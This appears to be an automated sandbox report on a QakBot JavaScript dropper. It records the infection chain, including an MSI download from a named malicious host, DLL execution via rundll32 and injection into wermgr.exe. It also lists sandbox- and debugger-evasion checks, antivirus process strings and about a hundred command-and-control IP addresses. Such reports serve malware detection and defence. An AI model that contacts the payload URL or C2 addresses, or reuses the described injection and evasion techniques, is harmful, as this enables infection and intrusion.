Source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\4fa980.msi Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI319E.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1002B980 4_2_1002B980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10059B40 4_2_10059B40
Java / VBScript file with very long strings (likely obfuscated code)
Source: ProjectFunding_450726_Jun01.js Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ProjectFunding_450726_Jun01.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF22471B5A50AA2E97.TMP Jump to behavior
Source: classification engine Classification label: mal92.troj.evad.winJS@10/19@3/100
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{73B1D26A-63AE-4441-A78B-E87C4AC58080}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{9F22E6A9-49AA-41B0-8132-BBF5C96D0FE5}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{9F22E6A9-49AA-41B0-8132-BBF5C96D0FE5}
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
Source: wscript.exe, 00000000.00000002.392487359.000001C96BBD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBP
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.400246774.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
PE file contains an invalid checksum
Source: main.dll.1.dr Static PE information: real checksum: 0xc399f should be: 0xcbceb
Drops PE files
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4744 base: DB3C50 value: E9 63 D7 DC FF Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BEHAVIORDUMPER.EXEU
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXE
Source: wermgr.exe, 00000005.00000003.424428035.0000000004C95000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROC_ANALYZER.EXEU
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\msiexec.exe TID: 5420 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5640 Thread sleep count: 188 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 4716 Thread sleep time: -30000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.7 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100559A0 GetVersionExA,GetVersionExA,GetVersionExA,GetSystemInfo, 4_2_100559A0
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1005C09A
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_00FC2297 mov eax, dword ptr fs:[00000030h] 4_3_00FC2297
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100379BC mov eax, dword ptr fs:[00000030h] 4_2_100379BC
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_1005C09A

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: BB0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: B80000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: DB3C50 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: B80000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: BB0000 protect: page read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\wermgr.exe base: B80000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100060D0 lgetVersion@Engine@ScScript@@SAHXZ,lgetStackTrace@DebugAPI@ScScript@@QBE?AVString@ScCore@@HH@Z,lgetName@Engine@ScScript@@QBEABVString@ScCore@@XZ, 4_2_100060D0
AV process strings found (often used to terminate AV products)
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000004.00000003.392256643.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Qbot
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.400127832.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Qbot
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.ee0950.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.400127832.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.400000830.0000000000ECA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 880006 Sample: ProjectFunding_450726_Jun01.js Startdate: 01/06/2023 Architecture: WINDOWS Score: 92 27 93.147.235.8 VODAFONE-IT-ASNIT Italy 2->27 29 201.143.215.69 UninetSAdeCVMX Mexico 2->29 31 95 other IPs or domains 2->31 41 Found malware configuration 2->41 43 Yara detected Qbot 2->43 45 Sample uses string decryption to hide its real strings 2->45 47 2 other signatures 2->47 9 msiexec.exe 78 29 2->9         started        13 wscript.exe 2->13         started        signatures3 process4 dnsIp5 39 garokelka.com 217.195.153.225, 443, 49719 SHOCK-1US Netherlands 9->39 25 C:\Users\user\AppData\Local\...\main.dll, PE32 9->25 dropped 15 rundll32.exe 9->15         started        17 wscript.exe 9->17         started        file6 process7 process8 19 rundll32.exe 15->19         started        signatures9 49 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 19->49 51 Writes to foreign memory regions 19->51 53 Allocates memory in foreign processes 19->53 55 Injects a PE file into a foreign processes 19->55 22 wermgr.exe 10 15 19->22         started        process10 dnsIp11 33 105.184.209.194, 995 Telkom-InternetZA South Africa 22->33 35 xfinity.com 96.114.21.40, 443, 49721, 49723 COMCAST-7922US United States 22->35 37 www.xfinity.com 22->37
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
75.143.236.149
 unknown United States
20115 CHARTER-20115US true
83.110.223.61
 unknown United Arab Emirates
5384 EMIRATES-INTERNETEmiratesInternetAE true
86.195.14.72
 unknown France
3215 FranceTelecom-OrangeFR true
84.215.202.8
 unknown Norway
41164 GET-NOGETNorwayNO true
184.182.66.109
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
80.167.196.79
 unknown Denmark
3292 TDCTDCASDK true
125.99.69.178
 unknown India
17488 HATHWAY-NET-APHathwayIPOverCableInternetIN true
89.32.156.5
 unknown Italy
48544 TECNOADSL-ASIT true
161.142.103.187
 unknown Malaysia
9930 TTNET-MYTIMEdotComBerhadMY true
213.64.33.92
 unknown Sweden
3301 TELIANET-SWEDENTeliaCompanySE true
114.143.176.236
 unknown India
17762 HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdIN true
24.234.220.88
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
14.192.241.76
 unknown Malaysia
9534 MAXIS-AS1-APBinariangBerhadMY true
173.88.135.179
 unknown United States
10796 TWC-10796-MIDWESTUS true
72.205.104.134
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
69.160.121.6
 unknown Jamaica
33576 DIG001JM true
117.195.17.148
 unknown India
9829 BSNL-NIBNationalInternetBackboneIN true
47.34.30.133
 unknown United States
20115 CHARTER-20115US true
70.49.205.198
 unknown Canada
577 BACOMCA true
184.181.75.148
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
84.35.26.14
 unknown Netherlands
21221 INFOPACT-ASTheNetherlandsNL true
41.227.190.59
 unknown Tunisia
2609 TN-BB-ASTunisiaBackBoneASTN true
86.168.210.41
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB true
100.4.163.158
 unknown United States
701 UUNETUS true
70.50.83.216
 unknown Canada
577 BACOMCA true
165.120.169.171
 unknown United States
2856 BT-UK-ASBTnetUKRegionalnetworkGB true
82.131.141.209
 unknown Hungary
20845 DIGICABLEHU true
68.203.69.96
 unknown United States
11427 TWC-11427-TEXASUS true
79.92.15.6
 unknown France
15557 LDCOMNETFR true
64.121.161.102
 unknown United States
6079 RCN-ASUS true
96.56.197.26
 unknown United States
6128 CABLE-NET-1US true
178.175.187.254
 unknown Moldova Republic of
43289 TRABIAMD true
125.99.76.102
 unknown India
17488 HATHWAY-NET-APHathwayIPOverCableInternetIN true
81.101.185.146
 unknown United Kingdom
5089 NTLGB true
98.187.21.2
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS true
92.149.250.113
 unknown France
3215 FranceTelecom-OrangeFR true
76.86.31.59
 unknown United States
20001 TWC-20001-PACWESTUS true
147.147.30.126
 unknown United Kingdom
6871 PLUSNETUKInternetServiceProviderGB true
96.87.28.170
 unknown United States
7922 COMCAST-7922US true
75.109.111.89
 unknown United States
19108 SUDDENLINK-COMMUNICATIONSUS true
124.122.47.148
 unknown Thailand
17552 TRUE-AS-APTrueInternetCoLtdTH true
88.126.94.4
 unknown France
12322 PROXADFR true
85.57.212.13
 unknown Spain
12479 UNI2-ASES true
103.101.203.177
 unknown Singapore
133136 MYREPUBLIC-SGMyRepublicLtdSG true
94.204.202.106
 unknown United Arab Emirates
15802 DU-AS1AE true
47.205.25.170
 unknown United States
5650 FRONTIER-FRTRUS true
95.45.50.93
 unknown Ireland
5466 EIRCOMInternetHouseIE true
85.61.165.153
 unknown Spain
12479 UNI2-ASES true
80.12.88.148
 unknown France
3215 FranceTelecom-OrangeFR true
103.144.201.48
 unknown unknown
139762 MSSOLUTION-AS-APSolutionBD true
102.156.10.183
 unknown Tunisia
37705 TOPNETTN true
86.132.236.117
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB true
205.237.67.69
 unknown Canada
11290 CC-3272CA true
201.143.215.69
 unknown Mexico
8151 UninetSAdeCVMX true
76.178.148.107
 unknown United States
10838 OCEANIC-INTERNET-RRUS true
69.242.31.249
 unknown United States
7922 COMCAST-7922US true
85.104.105.67
 unknown Turkey
9121 TTNETTR true
41.186.88.38
 unknown Rwanda
36890 MTNRW-ASNRW true
76.16.49.134
 unknown United States
7922 COMCAST-7922US true
90.104.151.37
 unknown France
3215 FranceTelecom-OrangeFR true
201.244.108.183
 unknown Colombia
19429 ETB-ColombiaCO true
103.42.86.42
 unknown India
133660 EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLt true
105.184.209.194
 unknown South Africa
37457 Telkom-InternetZA true
116.74.163.130
 unknown India
17488 HATHWAY-NET-APHathwayIPOverCableInternetIN true
116.120.145.170
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
103.139.242.6
 unknown India
138798 MUTINY-AS-INMutinySystemsPrivateLimitedIN true
70.28.50.223
 unknown Canada
577 BACOMCA true
217.195.153.225
 garokelka.com Netherlands
395092 SHOCK-1US false
98.145.23.67
 unknown United States
20001 TWC-20001-PACWESTUS true
81.229.117.95
 unknown Sweden
3301 TELIANET-SWEDENTeliaCompanySE true
82.125.44.236
 unknown France
3215 FranceTelecom-OrangeFR true
45.243.142.31
 unknown Egypt
24863 LINKdotNET-ASEG true
89.129.109.27
 unknown Spain
12479 UNI2-ASES true
27.109.19.90
 unknown India
17625 BLAZENET-IN-APBlazeNetsNetworkIN true
122.186.210.254
 unknown India
9498 BBIL-APBHARTIAirtelLtdIN true
122.184.143.86
 unknown India
9498 BBIL-APBHARTIAirtelLtdIN true
50.68.186.195
 unknown Canada
6327 SHAWCA true
45.62.70.33
 unknown Canada
40440 NRTC-CA true
83.249.198.100
 unknown Sweden
39651 COMHEM-SWEDENSE true
12.172.173.82
 unknown United States
2386 INS-ASUS true
47.199.241.39
 unknown United States
5650 FRONTIER-FRTRUS true
79.168.224.165
 unknown Portugal
2860 NOS_COMUNICACOESPT true
199.27.66.213
 unknown United States
40608 HCTNEBRASKAUS true
176.142.207.63
 unknown France
5410 BOUYGTEL-ISPFR true
86.176.83.44
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB true
92.154.17.149
 unknown France
3215 FranceTelecom-OrangeFR true
65.95.141.84
 unknown Canada
577 BACOMCA true
50.68.204.71
 unknown Canada
6327 SHAWCA true
89.79.229.50
 unknown Poland
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding true
71.38.155.217
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS true
77.126.99.230
 unknown Israel
9116 GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste true
103.123.223.133
 unknown India
138329 KWS-AS-APKenstarWebSolutionsPrivateLimitedIN true
31.53.29.235
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB true
198.2.51.242
 unknown United States
20001 TWC-20001-PACWESTUS true
93.147.235.8
 unknown Italy
30722 VODAFONE-IT-ASNIT true
92.9.45.20
 unknown United Kingdom
13285 OPALTELECOM-ASTalkTalkCommunicationsLimitedGB true
113.11.92.30
 unknown Bangladesh
7565 BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD true
96.114.21.40
 xfinity.com United States
7922 COMCAST-7922US false
77.86.98.236
 unknown United Kingdom
12390 KINGSTON-UK-ASGB true
172.115.17.50
 unknown United States
20001 TWC-20001-PACWESTUS true

Contacted Domains

Name IP Active
xfinity.com 96.114.21.40 true
garokelka.com 217.195.153.225 true
www.xfinity.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://garokelka.com/yjxcii.msi false
  • Avira URL Cloud: safe
 unknown
https://xfinity.com/ false
    		high